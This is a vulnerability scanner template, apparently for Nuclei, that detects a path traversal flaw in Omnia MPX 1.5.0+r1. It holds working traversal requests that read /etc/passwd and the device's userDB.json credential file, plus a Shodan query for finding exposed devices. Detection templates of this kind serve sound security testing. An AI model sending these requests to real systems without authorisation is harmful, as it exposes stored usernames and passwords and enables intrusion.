id: omnia-mpx-lfi

info:
  name: Omnia MPX 1.5.0+r1 - Path Traversal
  author: arafatansari,ritikchaddha
  severity: high
  description: |
    Omnia MPX 1.5.0+r1 is vulnerable to Path Traversal.
  reference:
    - https://www.exploit-db.com/exploits/50996
  metadata:
    verified: true
    shodan-query: http.html:"Omnia MPX"
  tags: lfi,omnia,mpx,traversal

requests:
  - method: GET
    path:
      - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
      - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: word
        part: body
        words:
          - '"username":'
          - '"password":'
          - '"mustChangePwd":'
          - '"roleUser":'
        condition: and